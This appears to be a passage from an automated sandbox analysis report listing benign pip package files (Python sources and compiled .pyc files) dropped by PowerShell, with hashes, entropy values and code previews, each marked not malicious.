                              Preview:........=.Cf..........................P.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.).z`Represents a wheel file and provides access to the various parts of the.name that have meaning.......N)...Dict..Iterable..List)...Tag)...InvalidWheelFilenamec..........................e.Z.d.Z.d.Z...e.j...................d.e.j...........................Z.d.e.d.d.f.d...Z.d.e.e.....f.d...Z.d.e.e.....d.e.f.d...Z.d.e.e.....d.e.e.e.f.....d.e.f.d...Z.d.e.e.....d.e.f.d...Z.y.)...Wheelz.A wheel filez.^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$..filename..returnNc..........................|.j...................j...................|.........}.|.s.t.........|...d.............|.|._.........|.j...................d.........j...................d.d.........|._.........|.j...................d.........j...................d.d.........|._.........|.j........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):931
                              Entropy (8bit):4.47254445210143
                              Encrypted:false
                              SSDEEP:24:1TLX4xHtjZk0reEeSErPYZAx07MSim0rcg0rvWbUaH:toN+0rehSEKg7E0rcg0r0UA
                              MD5:19D6ACE84BB3505BD0C0555DFCD2D7D8
                              SHA1:0F95933E28B70D16841D840B5025FE75F6264337
                              SHA-256:8443EEF15746139A95012BFABCBCFE47E460879FBB2CC6DA8B58E0B6130277C3
                              SHA-512:FC7AD543C2FAE0A914447564540F11B5E97F01E61D0160DFA054BDC1927C97F41A2A8992B2DD43D9CEBA9D8F7718D0CDD6FB21FEFD1BC758C0E580B7F21C77B4
                              Malicious:false
                              Preview:from pip._vendor.packaging.version import parse as parse_version..from pip._internal.models.link import Link.from pip._internal.utils.models import KeyBasedCompareMixin...class InstallationCandidate(KeyBasedCompareMixin):. """Represents a potential "candidate" for installation.""".. __slots__ = ["name", "version", "link"].. def __init__(self, name: str, version: str, link: Link) -> None:. self.name = name. self.version = parse_version(version). self.link = link.. super().__init__(. key=(self.name, self.version, self.link),. defining_class=InstallationCandidate,. ).. def __repr__(self) -> str:. return "<InstallationCandidate({!r}, {!r}, {!r})>".format(. self.name,. self.version,. self.link,. ).. def __str__(self) -> str:. return f"{self.name!r} candidate (version {self.version} at {self.link})".
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6889
                              Entropy (8bit):4.5391529804609565
                              Encrypted:false
                              SSDEEP:192:bSpgC4yyRu1C4L9+xf2BOdcoedGIELmuP/1QtTOX3ijzL/hWLBRA2YnHS7X:bSpgC43ReC4LExfS6coedGIELmuPtR4w
                              MD5:85AE2D81EC82E83403CC20439739F1EF
                              SHA1:2BE67E05E637FC6DEFE87897294B4A61043223FF
                              SHA-256:170A2E60129CA9C921EC1FA4D87DC75604618454EE905C2A892DE47EFB452D29
                              SHA-512:A89929AE9F624C15143A15EEEE5A040EF47FFD2879CC20690538EFB71949E634E7F86A5EA45A5E27947B507AFEBCF49136E27DF76E03C96BF11374774803EB96
                              Malicious:false
                              Preview:""" PEP 610 """.import json.import re.import urllib.parse.from typing import Any, Dict, Iterable, Optional, Type, TypeVar, Union..__all__ = [. "DirectUrl",. "DirectUrlValidationError",. "DirInfo",. "ArchiveInfo",. "VcsInfo",.]..T = TypeVar("T")..DIRECT_URL_METADATA_NAME = "direct_url.json".ENV_VAR_RE = re.compile(r"^\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?$")...class DirectUrlValidationError(Exception):. pass...def _get(. d: Dict[str, Any], expected_type: Type[T], key: str, default: Optional[T] = None.) -> Optional[T]:. """Get value from dictionary and verify expected type.""". if key not in d:. return default. value = d[key]. if not isinstance(value, expected_type):. raise DirectUrlValidationError(. f"{value!r} has unexpected type for {key} (expected {expected_type})". ). return value...def _get_required(. d: Dict[str, Any], expected_type: Type[T], key: str, default: Optional[T] = None.) -> T:. value = _get(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2486
                              Entropy (8bit):4.3270582835610565
                              Encrypted:false
                              SSDEEP:48:FFgUsUhREjmTCXrEVvRdeh4D003/Y4/kkaHyron2DlWU8lUJl:n7sIYPqDaHyg2DlWU8u
                              MD5:BDC269C3F40962AE622812360A68C3F3
                              SHA1:22CB3E5D1D2D4921C56BEE8B25322405D75660E6
                              SHA-256:C2DB10A922BD1DA522371404B81F82EB67958A6C3A1B8FD5405C55F7EFCA0C11
                              SHA-512:1C7F457CDD19975A0ABA60438CC5035F6FA7561B7B0339704AEF2F7FE55104F0CFF8EC66B61BFF74BD7CBEBF3F6DF8CFB89D230775B4B3258F51E729BBDB0767
                              Malicious:false
                              Preview:from typing import FrozenSet, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import CommandError...class FormatControl:. """Helper for managing formats from which a package can be installed.""".. __slots__ = ["no_binary", "only_binary"].. def __init__(. self,. no_binary: Optional[Set[str]] = None,. only_binary: Optional[Set[str]] = None,. ) -> None:. if no_binary is None:. no_binary = set(). if only_binary is None:. only_binary = set().. self.no_binary = no_binary. self.only_binary = only_binary.. def __eq__(self, other: object) -> bool:. if not isinstance(other, self.__class__):. return NotImplemented.. if self.__slots__ != other.__slots__:. return False.. return all(getattr(self, k) == getattr(other, k) for k in self.__slots__).. def __repr__(self) -> str:. return f"{self.__class__.__name__}
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1030
                              Entropy (8bit):4.660446953045376
                              Encrypted:false
                              SSDEEP:24:yTrPnCsK6Xlr4n7AizUQ+J/nICn8liQ2koAb911i7k2bPUMHN:yTrQ6XQZQQm78ktkoAb9O7J5t
                              MD5:F67480DB56CF588A2EE92844959BBABF
                              SHA1:26707B880BF178100E5A233E43832C57A4916895
                              SHA-256:B589CBF28C468B8692356BABD261BC0C03FBAC2EB2BA16BF33024EF31C3472B2
                              SHA-512:F8BEB8F1B1AC8A8AD038D04F1A3211A316851922083F28612F86F8CEB611354BD008F5253F8C322862894DE78BA1636BA0D4277DD20C813F043FEA0F10DC3A84
                              Malicious:false
                              Preview:import urllib.parse...class PackageIndex:. """Represents a Package Index and provides easier access to endpoints""".. __slots__ = ["url", "netloc", "simple_url", "pypi_url", "file_storage_domain"].. def __init__(self, url: str, file_storage_domain: str) -> None:. super().__init__(). self.url = url. self.netloc = urllib.parse.urlsplit(url).netloc. self.simple_url = self._url_for_path("simple"). self.pypi_url = self._url_for_path("pypi").. # This is part of a temporary hack used to block installs of PyPI. # packages which depend on external urls only necessary until PyPI can. # block such packages themselves. self.file_storage_domain = file_storage_domain.. def _url_for_path(self, path: str) -> str:. return urllib.parse.urljoin(self.url, path)...PyPI = PackageIndex("https://pypi.org/", file_storage_domain="files.pythonhosted.org").TestPyPI = PackageIndex(. "https://test.pypi.org/", file_storage_domain="t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2818
                              Entropy (8bit):4.461309983570084
                              Encrypted:false
                              SSDEEP:48:/+9xh5cEAuWUj0liK4C4O2IAqM2AJitkt0uXU9tyrIV/QRG7c/1i1eTbnQAyS:/cxh5ctun0IZyzGJiqU9orgoRGwNi1ef
                              MD5:09657AB688E36AE6641F732999FF5E92
                              SHA1:8E0E2F7C9AE3D859A2F11D6DBBC5F7AEA26CC1E5
                              SHA-256:CD1559A1ACFEDAFB2B7B38FF1F784B3A131908AF5CED36F35A00BE8CE6A50F4D
                              SHA-512:A8BE098B587C9B3CDB530BA7D5468450AFF000843A94E5AEA689A71CCAA78E763C51EBD06CF49A9B3503CFAB3B278DC487577000EA5A6541991CB738CDAA8F96
                              Malicious:false
                              Preview:from typing import Any, Dict, Sequence..from pip._vendor.packaging.markers import default_environment..from pip import __version__.from pip._internal.req.req_install import InstallRequirement...class InstallationReport:. def __init__(self, install_requirements: Sequence[InstallRequirement]):. self._install_requirements = install_requirements.. @classmethod. def _install_req_to_dict(cls, ireq: InstallRequirement) -> Dict[str, Any]:. assert ireq.download_info, f"No download_info for {ireq}". res = {. # PEP 610 json for the download URL. download_info.archive_info.hashes may. # be absent when the requirement was installed from the wheel cache. # and the cache entry was populated by an older pip version that did not. # record origin.json.. "download_info": ireq.download_info.to_dict(),. # is_direct is true if the requirement was a direct URL reference (which. # includes editable requi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):20777
                              Entropy (8bit):4.5847812976968205
                              Encrypted:false
                              SSDEEP:384:UTt7OjNT51GuxMgExJAvYDr3pJYQ+ebhH4Lb3GIppfT3QBHnarT3:A7UNT51rxkxmw/ZJx+YhH4Lb3G8tzQhg
                              MD5:EB81AAD0A35DD6B2DE4C27B643E404C7
                              SHA1:15A3B67CF3296F1DF342BACB84F02BF3FE532234
                              SHA-256:5E2ACE006BF58E032EEEFBBCEE4B8F6E88468FB547A7056B776AB729481540D8
                              SHA-512:EF236F8A11582F93B856F4F9888CBEDFFC30A995E1A04F567F31128CF985831EF996581B8190E7E65E5B3A273A77176CA3DA88EB6C1867A1EC0B7121039EC73D
                              Malicious:false
                              Preview:import functools.import itertools.import logging.import os.import posixpath.import re.import urllib.parse.from dataclasses import dataclass.from typing import (. TYPE_CHECKING,. Any,. Dict,. List,. Mapping,. NamedTuple,. Optional,. Tuple,. Union,.)..from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import WHEEL_EXTENSION.from pip._internal.utils.hashes import Hashes.from pip._internal.utils.misc import (. pairwise,. redact_auth_from_url,. split_auth_from_netloc,. splitext,.).from pip._internal.utils.models import KeyBasedCompareMixin.from pip._internal.utils.urls import path_to_url, url_to_path..if TYPE_CHECKING:. from pip._internal.index.collector import IndexContent..logger = logging.getLogger(__name__)...# Order matters, earlier hashes have a precedence over later hashes for what.# we will pick to use.._SUPPORTED_HASHES = ("sha512", "sha384", "sha256", "sha224", "sha1", "md5")...@dataclass(frozen=True)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):738
                              Entropy (8bit):4.455127026433689
                              Encrypted:false
                              SSDEEP:12:QCBhJAYp5FaREQr4GtXUSd7mry13LElvv1sydX/YwcjcFCbP:DhRLwHUEdCry130sOejcQ7
                              MD5:77B8766C2C20290FC2545CB9F68E64EB
                              SHA1:FC639818C98AB821887BD5AE95FD49DED2D8634A
                              SHA-256:DC4150A7F202BBFB211F5F9306A865D1002EB0A08F0C53A580715E3785E8C16B
                              SHA-512:BE0B3E58A796077E457526ABE8C9E1EE7D3D5707B588DB4E655BA454546DE0366189C34811954680E2CFE6172F04DD4BD6AF4FEE4599BADD63FF0126A5A344EF
                              Malicious:false
                              Preview:""".For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation.."""...SCHEME_KEYS = ["platlib", "purelib", "headers", "scripts", "data"]...class Scheme:. """A Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. """.. __slots__ = SCHEME_KEYS.. def __init__(. self,. platlib: str,. purelib: str,. headers: str,. scripts: str,. data: str,. ) -> None:. self.platlib = platlib. self.purelib = purelib. self.headers = headers. self.scripts = scripts. self.data = data.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4643
                              Entropy (8bit):4.246322915605786
                              Encrypted:false
                              SSDEEP:48:WxeLxlCN2huvcRLnU6rgU0Sgb6LhqqqlAeQEW4aL79B1sOp8DMUPD7iGKzK0MLwj:VxlCNRkRbJG6FSlArn4a/tIrL0Mi9
                              MD5:3BC5A1B39721B6B06248F40CBEBB40D9
                              SHA1:6EC69D7090B207E5B202989ACD581D0B86A0118D
                              SHA-256:012572C99C622482F0EDB4C8555A49C7C276F773371E4E45DF78A51A7D1EF347
                              SHA-512:8DF2CB44F070630447205681F141E457B3900C1AE4582C40B3A0ECDF666DCBC667E8EE9B1D6D60BC32AC4260BBEE697A04DDB0E689A056091AC218A5EAE355DC
                              Malicious:false
                              Preview:import itertools.import logging.import os.import posixpath.import urllib.parse.from typing import List..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.models.index import PyPI.from pip._internal.utils.compat import has_tls.from pip._internal.utils.misc import normalize_path, redact_auth_from_url..logger = logging.getLogger(__name__)...class SearchScope:.. """. Encapsulates the locations that pip is configured to search.. """.. __slots__ = ["find_links", "index_urls", "no_index"].. @classmethod. def create(. cls,. find_links: List[str],. index_urls: List[str],. no_index: bool,. ) -> "SearchScope":. """. Create a SearchScope object after normalizing the `find_links`.. """. # Build find_links. If an argument starts with ~, it may be. # a local file relative to a home directory. So try normalizing. # it and if it exists, use the normalized version.. # This is del
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1907
                              Entropy (8bit):4.375302448918886
                              Encrypted:false
                              SSDEEP:24:1REm/+RAsQ8GYLRvBo2qBVP2XMglzB7QMaqn7V4eMQKuIgrGIpshf/Pg7d7l05IW:SAG1iVglQONze/Y2
                              MD5:A9FA37FF60BA1523C11FD12AF309E711
                              SHA1:64627B9F7F60ADD87CFE2D2B107D262480AAB44E
                              SHA-256:299762EBA82C47EFD151752BF6E7A3B2C937AE64C7AD054959E340DAC57E5526
                              SHA-512:DA77858C1164B41B596907B9323573DE1B7870F75B434A407E3652E97B13668238EF4F1A99D77727E7DF7043F8A4C61F6965458768ADDB7AC0824C6CEAEEDBA8
                              Malicious:false
                              Preview:from typing import Optional..from pip._internal.models.format_control import FormatControl...class SelectionPreferences:. """. Encapsulates the candidate selection preferences for downloading. and installing files.. """.. __slots__ = [. "allow_yanked",. "allow_all_prereleases",. "format_control",. "prefer_binary",. "ignore_requires_python",. ].. # Don't include an allow_yanked default value to make sure each call. # site considers whether yanked releases are allowed. This also causes. # that decision to be made explicit in the calling code, which helps. # people when reading the code.. def __init__(. self,. allow_yanked: bool,. allow_all_prereleases: bool = False,. format_control: Optional[FormatControl] = None,. prefer_binary: bool = False,. ignore_requires_python: Optional[bool] = None,. ) -> None:. """Create a SelectionPreferences object... :param allow_yank
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4272
                              Entropy (8bit):4.305122138474475
                              Encrypted:false
                              SSDEEP:48:kc9EQKRRanYetfd3atqSKpclTqQPEfheKckjXiOf3N08lsqHpadDPcfAzLGXN8Ln:kc7Kj7e9tatQpclTqQPLK0uVOPoKQLWV
                              MD5:2DF3C0F383CD9A90B1C6EC3785F267EC
                              SHA1:479A26A092F77A856B804A38331A6B8D2440CFC6
                              SHA-256:DF8124A2BACCB91BD1A7E6E3A87289F9B38EEF59BDC5D8CDD9BF16585102D875
                              SHA-512:83A41BA6F48A235E75B8B97EFBF64DC777B24E92E1D011E6403C326891040AF544047CE1FBE41417DBDC6EBD5755D612B3D98CC68B1729A3FAB48A545E3937F7
                              Malicious:false
                              Preview:import sys.from typing import List, Optional, Set, Tuple..from pip._vendor.packaging.tags import Tag..from pip._internal.utils.compatibility_tags import get_supported, version_info_to_nodot.from pip._internal.utils.misc import normalize_version_info...class TargetPython:.. """. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. """.. __slots__ = [. "_given_py_version_info",. "abis",. "implementation",. "platforms",. "py_version",. "py_version_info",. "_valid_tags",. "_valid_tags_set",. ].. def __init__(. self,. platforms: Optional[List[str]] = None,. py_version_info: Optional[Tuple[int, ...]] = None,. abis: Optional[List[str]] = None,. implementation: Optional[str] = None,. ) -> None:. """. :param platforms: A list of strings or None. If None, searches for. packages that are supported by the
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3600
                              Entropy (8bit):4.5473966910251695
                              Encrypted:false
                              SSDEEP:96:LwCUcYKBjGYBcAkEOYKiKV/8N1lE/GNLnxP1:VJBiBUE/Gr1
                              MD5:A6E4DE72BC628633E4AC9598B55EA9E7
                              SHA1:CF55FF5F5C3457AD21CFB24F341871B7378A4197
                              SHA-256:62A6B3A0867299AFD0D5E8C56B50BB3472904515A5BD691D2BDE9544A98305E2
                              SHA-512:8862E0663343C8B476C1EB5BEEBD7CE0FF05B3D43772F9B221CEF20EFDF8F148D0B77B4701454647C5BFF1C7034C4FE344B8B80F094845BAB5475BB3B6361C57
                              Malicious:false
                              Preview:"""Represents a wheel file and provides access to the various parts of the.name that have meaning..""".import re.from typing import Dict, Iterable, List..from pip._vendor.packaging.tags import Tag..from pip._internal.exceptions import InvalidWheelFilename...class Wheel:. """A wheel file""".. wheel_file_re = re.compile(. r"""^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$""",. re.VERBOSE,. ).. def __init__(self, filename: str) -> None:. """. :raises InvalidWheelFilename: when the filename is invalid for a wheel. """. wheel_info = self.wheel_file_re.match(filename). if not wheel_info:. raise InvalidWheelFilename(f"{filename} is not a valid wheel filename."). self.filename = filename. self.name = wheel_info.group("name").replace("_", "-"). # we'll assume "_" means "-" due to whe
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):50
                              Entropy (8bit):4.1288840705376355
                              Encrypted:false
                              SSDEEP:3:5WFVQtGSKH4F0MzDv:YQtG5YiMfv
                              MD5:3893F116D94097C4AE72769A5F7C21F7
                              SHA1:CC7B633895C11040D0B99E7D0575B1D031652035
                              SHA-256:8DFE93B799D5FFBCE401106B2A88C85C8B607A3BE87A054954A51B8406B92287
                              SHA-512:924BC4A7222FC638FC8FAB4A6E7AEA876E25DCD355AFF628AA21A77BA0ECE90E774FA75D1797CFE688B7129626AAE395662489419AD53CAB4A842367FE97BCB8
                              Malicious:false
                              Preview:"""Contains purely network-related utilities..""".
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):263
                              Entropy (8bit):5.12966968419851
                              Encrypted:false
                              SSDEEP:6:r18aCCVmXQtG5YiMh/Z6B0Wltwn23d6oAreKAsShMR6IaYleHXlll:GaCCMXVYic6BvPxImblMRjaYkH1ll
                              MD5:2C201F832F87EDBC1196D6730518227F
                              SHA1:EF2B2A43846E4FB63108BE880F4555F6952CCB77
                              SHA-256:8DE3833DC1C61D3572189F0C688A5C55B021F42483C981A4F57CE21CFC82B476
                              SHA-512:853BAA6052460BA892B01F647BA09CCD6D598C07A3676081E05752D5CFD7392348405BD3AFFA8C962C960EE966F5151D5FCEFBAD05B014F979B5FD63D997EE9E
                              Malicious:false
                              Preview:........=.Cf2...............................d.Z.y.).z+Contains purely network-related utilities..N)...__doc__........jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/__init__.py..<module>r........s..............r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):22005
                              Entropy (8bit):5.366434828973916
                              Encrypted:false
                              SSDEEP:384:7HtN0q2zfeqFDTXfadOA3Z7eNkgy/nYH8ka76wkhsMh/ccO2:Ltyq2P9Tm7eNkgyb5wsMh/cF2
                              MD5:CCC11CD1CED1DD60049EF8F0451F10EB
                              SHA1:1F1EA1A37B0DF17263886778D65F1E492353F2FC
                              SHA-256:CAB3BDEB1BE93EFEB8F0BDA2D7091B7849A8DD051C7C59C7DE6B62310B6236BF
                              SHA-512:E54943E5BEDBBE75A2EDFFC96CC16D1B552102B2CCFD50691A67C931134C0683D2458DF0E20AEFB87916E7E8DD7475557B5AACD0DCD961CF35600B01DF13727F
                              Malicious:false
                              Preview:........=.Cf=P.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$m%Z%m&Z&m'Z'..d.d.l(m)Z)....e!e*........Z+d.a,..G.d...d.e.........Z-..G.d...d.e.........Z...G.d...d.e.........Z/..G.d...d.e.........Z0..G.d...d.e.........Z1..e.d...........d.e2d.e.f.d...........Z3..G.d...d.e.........Z4y.).z.Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests.......N)...ABC..abstractmethod)...lru_cache)...commonprefix)...Path)...Any..Dict..List..NamedTuple..Optional..Tuple)...AuthBase..HTTPBasicAuth)...Request..Response)...get_netrc_auth)...getLogger)...ask..ask_input..ask_password..remove_auth_from_url..split_auth_netloc_from_url)...AuthInfoFc.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6527
                              Entropy (8bit):5.31891868939367
                              Encrypted:false
                              SSDEEP:96:bQkt80ENOtSKYrAdjB97K761ekKg7j03mgFPnB:0ka0ENOpLK7Me1g7I/PB
                              MD5:5A25121D35636B022A732524F975BF9D
                              SHA1:C58EC56039A3104BEDE91EF0F30A3237E35468EE
                              SHA-256:AC0AD3B504C5A8B11BCB8C031AD6EF4C2CD1BE5B79B342EC1DC7234FF61ACF33
                              SHA-512:7D26C1F11000602E0CFD9033AFFD088877EFDF03273335FBE8CFF7AD8CCFEB645EFE2AC1B8820FCC8E36B9EC89790728DC4D5A83B1F26BAD9E702A9691911D37
                              Malicious:false
                              Preview:........=.Cf_...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.e.d.e.d.....f.d...........Z...G.d...d.e.........Z.y.).z.HTTP cache implementation.......N)...contextmanager)...datetime)...BinaryIO..Generator..Optional..Union)...SeparateBodyBaseCache)...SeparateBodyFileCache)...Response)...adjacent_tmp_file..replace)...ensure_dir..response..returnc...........................t.........|.d.d.........S.).N..from_cacheF)...getattr).r....s.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/cache.py..is_from_cacher........s..........8.\.5..1..1.....).NNNc................#....4...K.......d.......y.#.t.........$.r...Y.y.w.x.Y.w...w.).zvIf we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. N)...OSError..r....r......suppressed_cache_errorsr........s...................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8562
                              Entropy (8bit):5.374802796254879
                              Encrypted:false
                              SSDEEP:192:blJI3fTWKcFJ3YHTZteuu2QZMXlW/UTGvIyjztv3:Zy3CKcFdYHuuCIWMqvZlv3
                              MD5:C788028157FE5169B885E8D4E7472A53
                              SHA1:3CC961263A8B903A5C9EAAD64BAF9F63DB43FBB5
                              SHA-256:B718CD6E419F6A01C2F01A88567A92F122B49FDABFB21A46119BB0923223012E
                              SHA-512:D3A46E9F95BDF870ACD7472453DECBD73763D296BCC9B0E84B4CDE6C1FB16B91ABE79333AE367AB3E758245ADEF6237B533586ACAEEE87E03B311E8C0C68150B
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z ....e.jB..................e"........Z#d.e.d.e.e$....f.d...Z%d.e.d.e.d.e&d.e.e'....f.d...Z(d.e&d.e&f.d...Z)d.e&d.e&d.e&f.d...Z*d.e.d.e.d.e&f.d...Z+d.e.d.e.d.e.f.d...Z,..G.d...d.........Z-..G.d...d.........Z.y.).z)Download files with progress indicators.......N)...Iterable..Optional..Tuple)...CONTENT_CHUNK_SIZE..Response)...get_download_progress_renderer)...NetworkConnectionError)...PyPI)...Link)...is_from_cache)...PipSession)...HEADERS..raise_for_status..response_chunks)...format_size..redact_auth_from_url..splitext..resp..returnc.....................h.......t.........|.j...................d.............S.#.t.........t.........t.........f.$.r...Y.y.w.x.Y.w.).Nz.content-length)...int..headers..ValueError..KeyError..TypeError).r....s.... .jC:\Users\boadi\AppData\Loca
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11672
                              Entropy (8bit):5.4069467854436795
                              Encrypted:false
                              SSDEEP:192:MFiKFuQcQoJ6E0zpnyIDLLh3fbpwAHWQfpOSsOB5qMTn:MFi9Qbo3epyMLLhTpwS0SJB5qun
                              MD5:70FAFCDECE8B7E0ED12A35873F66D158
                              SHA1:AAB7AC9ED0D4A7CBDC392CCA57F724F06B102A77
                              SHA-256:24E75B60A3DCBC24F6E2B09D02A0E0037C41E36BCEFD7A354034F6DC0161C7A2
                              SHA-512:7583C851EF32E72E844407D927C1EF88F611A8F07501AA457E8FD75AF13CC76B2A689394071551347F3F173D5092EB4BBC801359873EFBA735FE14A8CFE754A3
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!....G.d...d.e"........Z#d.e$d.e$d.e.d.e.f.d...Z%..G.d...d.........Z&y.).z.Lazy ZIP over HTTP..HTTPRangeRequestUnsupported..dist_from_wheel_url.....)...bisect_left..bisect_right)...contextmanager)...NamedTemporaryFile)...Any..Dict..Generator..List..Optional..Tuple)...BadZipFile..ZipFile)...canonicalize_name)...CONTENT_CHUNK_SIZE..Response)...BaseDistribution..MemoryWheel..get_wheel_distribution)...PipSession)...HEADERS..raise_for_status..response_chunksc...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/lazy_wheel.pyr....r........s.........r .....name..url..session..returnc..........................t.........|.|.........5.}.t.........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):18783
                              Entropy (8bit):5.508650572055059
                              Encrypted:false
                              SSDEEP:384:0A5O3ATqK1yo9Uhmo3ZcmrVDW34lNfouw7CIFv+hF6zrN:0A5OeUcgnfO+hFMrN
                              MD5:98634B071EE912D7A9C484B966CAC739
                              SHA1:65CF6202B8BCFB58E5CBD64DBCA6E1CC10FDBD4D
                              SHA-256:12AAB06AA2860883281A480306C5A6B69D725595B4CEA635C902FD426D45147D
                              SHA-512:670E92B260FBDC78BD2EFAD906924A9290F7BE9906FE0482B3AD07D32B563131F647126707B817F19761274C515C1FC4460E1AC989DA8711C2C065BEE98D5E9C
                              Malicious:false
                              Preview:........=.Cf.I..............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z ..d.d.l!m"Z"m#Z#..d.d.l!m$Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>m?Z?..d.d.l@mAZA..e.r.d.d.lBmCZC..d.d.lDmEZE....e.j...................eG........ZHe.eIeIe.e.eJeIf.........f.....ZK..e.j...................d.e.............g.d...ZMe.eK....eNd.<...d.ZOd.ePf.d...ZQd.eIf.d...ZR..G.d...d e#........ZS..G.d!..d"........ZT..G.d#..d$eTe%........Z$..G.d%..d&eTe ........Z...G.d'..d(e$........ZU..G.d)..d*e.........ZV..G.d+..d,e.j...........................ZXy.)-zhPipSession and supporting code, containing all pip-specific.network request configuration and behavior.......N)...TYPE_CHECKING..Any..Dict..Generator..List..Mapping..Optional..Sequence..Tuple..Union)...reques
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2262
                              Entropy (8bit):5.570814558468571
                              Encrypted:false
